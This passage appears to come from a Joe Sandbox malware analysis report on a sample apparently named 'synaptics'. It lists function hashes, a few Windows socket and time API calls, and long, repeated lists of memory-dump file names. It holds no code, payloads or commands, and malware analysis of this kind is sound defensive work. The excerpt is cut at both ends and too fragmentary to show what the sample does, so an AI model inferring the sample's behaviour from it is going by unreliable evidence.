                                                                                                                                                                                                                                    • Instruction ID: 9a1ab119f63b8fb3b39d0f2aa8e7151cf9b954c026578f74cce7ade8896154ea
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85bb367952443aceb0a59b5c5d8911a814ec7c58f05a08f0cd440753a80b477f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51318E7278970036F72056719D46FBB361AAB47B15F08493AFF10F9EC2D7A0D40562AA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • getsockopt.WS2_32(?,0000FFFF,00001006,?,?), ref: 6C719984
                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,?,?,?), ref: 6C7199CF
                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(00000000,?,?,?), ref: 6C7199DF
                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00001006,?,00000004), ref: 6C719AE0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$System$Filegetsockoptsetsockopt
                                                                                                                                                                                                                                    • String ID: gfff
                                                                                                                                                                                                                                    • API String ID: 20766835-1553575800
                                                                                                                                                                                                                                    • Opcode ID: 02327df7d91fc56601d39db75cefd9df72af307775c86a5a657b4782cfb433af
                                                                                                                                                                                                                                    • Instruction ID: 92aeaafd54a2e8e817714a3bc8678fffc17a129b63cadf7a25c3925a2ccec6f9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02327df7d91fc56601d39db75cefd9df72af307775c86a5a657b4782cfb433af
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C651C3717083018BC718DF29DA84A5ABBE5BBC8704F484A3EF559C7B51EB70E909CB42
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 6C719172
                                                                                                                                                                                                                                    • send.WS2_32(?,?,?,00000000), ref: 6C719185
                                                                                                                                                                                                                                    • sendto.WS2_32(?,?,?,00000000,00000000), ref: 6C7191A8
                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 6C7191CC
                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 6C71920F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
